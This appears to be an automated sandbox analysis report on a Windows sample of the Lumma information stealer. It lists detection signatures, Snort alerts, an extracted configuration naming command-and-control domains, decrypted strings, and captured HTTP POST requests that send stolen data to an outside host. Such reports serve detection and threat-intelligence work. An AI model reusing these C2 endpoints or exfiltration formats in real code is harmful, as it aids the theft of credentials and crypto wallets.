Edit tour

Windows Analysis Report
Ag3ijL3z1w.exe

Overview

General Information

Sample name:	Ag3ijL3z1w.exe renamed because original name is a hash value
Original sample name:	038f01c7ab34d20394b657ce5d5f3152.exe
Analysis ID:	1414024
MD5:	038f01c7ab34d20394b657ce5d5f3152
SHA1:	7f82fb84c6c0aff1012675d48ba95b0558d3230f
SHA256:	28119987147a63910d12662c2008089f85571817695dcd443d02303d52479c55
Tags:	exe
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Detected potential crypto function

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Ag3ijL3z1w.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\Ag3ijL3z1w.exe" MD5: 038F01C7AB34D20394B657CE5D5F3152)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "relevantvoicelesskw.shop", "colorfulequalugliess.shop", "wisemassiveharmonious.shop", "colorfulequalugliess.shop"], "Build id": "g5MvTC--"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: Ag3ijL3z1w.exe PID: 7264	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Ag3ijL3z1w.exe PID: 7264	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Ag3ijL3z1w.exe PID: 7264	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Snort Signatures

ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 172.67.147.173

Timestamp:	03/22/24-13:54:05.472247
SID:	2051588
Source Port:	49735
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 172.67.147.173

Timestamp:	03/22/24-13:54:10.961651
SID:	2051588
Source Port:	49739
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (colorfulequalugliess .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	03/22/24-13:54:02.814250
SID:	2051587
Source Port:	57667
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 172.67.147.173

Timestamp:	03/22/24-13:54:03.114371
SID:	2051588
Source Port:	49732
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 172.67.147.173

Timestamp:	03/22/24-13:54:09.869399
SID:	2051588
Source Port:	49738
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (wisemassiveharmonious .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	03/22/24-13:54:02.910864
SID:	2051586
Source Port:	63995
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 172.67.147.173

Timestamp:	03/22/24-13:54:08.102502
SID:	2051588
Source Port:	49737
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 172.67.147.173

Timestamp:	03/22/24-13:54:03.862026
SID:	2051588
Source Port:	49733
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 172.67.147.173

Timestamp:	03/22/24-13:54:06.419545
SID:	2051588
Source Port:	49736
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) - Source IP: 192.168.2.4 - Destination IP: 172.67.147.173

Timestamp:	03/22/24-13:54:04.720277
SID:	2051588
Source Port:	49734
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (relevantvoicelesskw .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	03/22/24-13:54:03.009215
SID:	2051584
Source Port:	51440
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: edurestunningcrackyow.fun	URL Reputation: Label: malware
Source: edurestunningcrackyow.fun	URL Reputation: Label: malware
Source: https://relevantvoicelesskw.shop/apiA	Avira URL Cloud: Label: phishing
Source: https://relevantvoicelesskw.shop/~	Avira URL Cloud: Label: phishing
Source: https://relevantvoicelesskw.shop/	Avira URL Cloud: Label: phishing
Source: https://relevantvoicelesskw.shop/api~	Avira URL Cloud: Label: phishing
Source: https://relevantvoicelesskw.shop/api6	Avira URL Cloud: Label: phishing
Source: colorfulequalugliess.shop	Avira URL Cloud: Label: phishing
Source: https://relevantvoicelesskw.shop/api0	Avira URL Cloud: Label: phishing
Source: https://relevantvoicelesskw.shop/b	Avira URL Cloud: Label: phishing
Source: https://relevantvoicelesskw.shop:443/apiBE2NhtLOoTLNNgOkw	Avira URL Cloud: Label: phishing
Source: https://relevantvoicelesskw.shop/s	Avira URL Cloud: Label: phishing
Source: https://relevantvoicelesskw.shop/api	Avira URL Cloud: Label: malware
Source: relevantvoicelesskw.shop	Avira URL Cloud: Label: phishing
Source: https://relevantvoicelesskw.shop/l	Avira URL Cloud: Label: phishing

Found malware configuration

Source: 0.2.Ag3ijL3z1w.exe.60000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["associationokeo.shop", "turkeyunlikelyofw.shop", "pooreveningfuseor.pw", "edurestunningcrackyow.fun", "detectordiscusser.shop", "relevantvoicelesskw.shop", "colorfulequalugliess.shop", "wisemassiveharmonious.shop", "colorfulequalugliess.shop"], "Build id": "g5MvTC--"}

Multi AV Scanner detection for domain / URL

Source: relevantvoicelesskw.shop	Virustotal: Detection: 20%	Perma Link
Source: colorfulequalugliess.shop	Virustotal: Detection: 20%	Perma Link
Source: wisemassiveharmonious.shop	Virustotal: Detection: 9%	Perma Link
Source: https://relevantvoicelesskw.shop/	Virustotal: Detection: 18%	Perma Link
Source: https://relevantvoicelesskw.shop/apiA	Virustotal: Detection: 10%	Perma Link
Source: colorfulequalugliess.shop	Virustotal: Detection: 20%	Perma Link
Source: https://relevantvoicelesskw.shop/api0	Virustotal: Detection: 10%	Perma Link
Source: wisemassiveharmonious.shop	Virustotal: Detection: 9%	Perma Link
Source: https://relevantvoicelesskw.shop/api6	Virustotal: Detection: 20%	Perma Link
Source: https://relevantvoicelesskw.shop/api	Virustotal: Detection: 21%	Perma Link
Source: relevantvoicelesskw.shop	Virustotal: Detection: 20%	Perma Link

Machine Learning detection for sample

Source: Ag3ijL3z1w.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String decryptor: associationokeo.shop
Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String decryptor: turkeyunlikelyofw.shop
Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String decryptor: pooreveningfuseor.pw
Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String decryptor: edurestunningcrackyow.fun
Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String decryptor: detectordiscusser.shop
Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String decryptor: relevantvoicelesskw.shop
Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String decryptor: colorfulequalugliess.shop
Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String decryptor: wisemassiveharmonious.shop
Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String decryptor: colorfulequalugliess.shop
Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1874279001.0000000000097000.00000002.00000001.01000000.00000003.sdmp	String decryptor: g5MvTC--

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe

Code function: 0_2_00074F69 CryptUnprotectData,

Source: Ag3ijL3z1w.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.147.173:443 -> 192.168.2.4:49739 version: TLS 1.2

Source: Ag3ijL3z1w.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe

Directory queried: number of queries: 1001

Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov ecx, dword ptr [esi+00000080h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then cmp dword ptr [eax-08h], 5C3924FCh
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then lea esi, dword ptr [edx+ecx]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov ecx, dword ptr [esi+08h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then jmp eax
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov ecx, dword ptr [esp+000000A8h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov ecx, edi
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov eax, dword ptr [0009DC58h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov ecx, dword ptr [esp+10h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov eax, dword ptr [esi+08h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov ecx, dword ptr [esi+00000080h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov eax, edi
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then movzx eax, byte ptr [esi+ecx]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then test esi, esi
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then jmp ecx
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov ecx, dword ptr [esi+00000080h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000080h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then jmp eax
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then jmp ecx
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then jmp ecx
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then add ecx, dword ptr [esp+eax*4+30h]
Source: C:\Users\user\Desktop\Ag3ijL3z1w.exe	Code function: 4x nop then mov edi, dword ptr [esi+0Ch]

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2051587 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (colorfulequalugliess .shop) 192.168.2.4:57667 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2051586 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (wisemassiveharmonious .shop) 192.168.2.4:63995 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2051584 ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (relevantvoicelesskw .shop) 192.168.2.4:51440 -> 1.1.1.1:53
Source: Traffic	Snort IDS: 2051588 ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) 192.168.2.4:49732 -> 172.67.147.173:443
Source: Traffic	Snort IDS: 2051588 ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) 192.168.2.4:49733 -> 172.67.147.173:443
Source: Traffic	Snort IDS: 2051588 ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) 192.168.2.4:49734 -> 172.67.147.173:443
Source: Traffic	Snort IDS: 2051588 ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) 192.168.2.4:49735 -> 172.67.147.173:443
Source: Traffic	Snort IDS: 2051588 ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) 192.168.2.4:49736 -> 172.67.147.173:443
Source: Traffic	Snort IDS: 2051588 ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) 192.168.2.4:49737 -> 172.67.147.173:443
Source: Traffic	Snort IDS: 2051588 ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) 192.168.2.4:49738 -> 172.67.147.173:443
Source: Traffic	Snort IDS: 2051588 ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI) 192.168.2.4:49739 -> 172.67.147.173:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: associationokeo.shop
Source: Malware configuration extractor	URLs: turkeyunlikelyofw.shop
Source: Malware configuration extractor	URLs: pooreveningfuseor.pw
Source: Malware configuration extractor	URLs: edurestunningcrackyow.fun
Source: Malware configuration extractor	URLs: detectordiscusser.shop
Source: Malware configuration extractor	URLs: relevantvoicelesskw.shop
Source: Malware configuration extractor	URLs: colorfulequalugliess.shop
Source: Malware configuration extractor	URLs: wisemassiveharmonious.shop
Source: Malware configuration extractor	URLs: colorfulequalugliess.shop

Source: Joe Sandbox View

IP Address: 172.67.147.173 172.67.147.173

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: relevantvoicelesskw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=FnuETJjUsrdfuYJhYL5t.r6fDFk2VbK_r58LuDbvYFI-1711112043-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 49Host: relevantvoicelesskw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=FnuETJjUsrdfuYJhYL5t.r6fDFk2VbK_r58LuDbvYFI-1711112043-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19496Host: relevantvoicelesskw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=FnuETJjUsrdfuYJhYL5t.r6fDFk2VbK_r58LuDbvYFI-1711112043-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 9606Host: relevantvoicelesskw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=FnuETJjUsrdfuYJhYL5t.r6fDFk2VbK_r58LuDbvYFI-1711112043-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: relevantvoicelesskw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=FnuETJjUsrdfuYJhYL5t.r6fDFk2VbK_r58LuDbvYFI-1711112043-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7077Host: relevantvoicelesskw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=FnuETJjUsrdfuYJhYL5t.r6fDFk2VbK_r58LuDbvYFI-1711112043-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1409Host: relevantvoicelesskw.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1Cookie: __cf_mw_byp=FnuETJjUsrdfuYJhYL5t.r6fDFk2VbK_r58LuDbvYFI-1711112043-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587977Host: relevantvoicelesskw.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: colorfulequalugliess.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: relevantvoicelesskw.shop

Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Ag3ijL3z1w.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Ag3ijL3z1w.exe	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Ag3ijL3z1w.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Ag3ijL3z1w.exe, 00000000.00000003.1729643090.00000000030A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Ag3ijL3z1w.exe, 00000000.00000003.1713273468.00000000030B7000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713220364.00000000030B9000.00000004.00000800.00020000.00000000.sdmp, Ag3ijL3z1w.exe, 00000000.00000003.1713354464.00000000030B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Ag3ijL3z1w.exe, 00000000.00000003.1872445317.0000000000B24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://relevantvoicelesskw.shop/
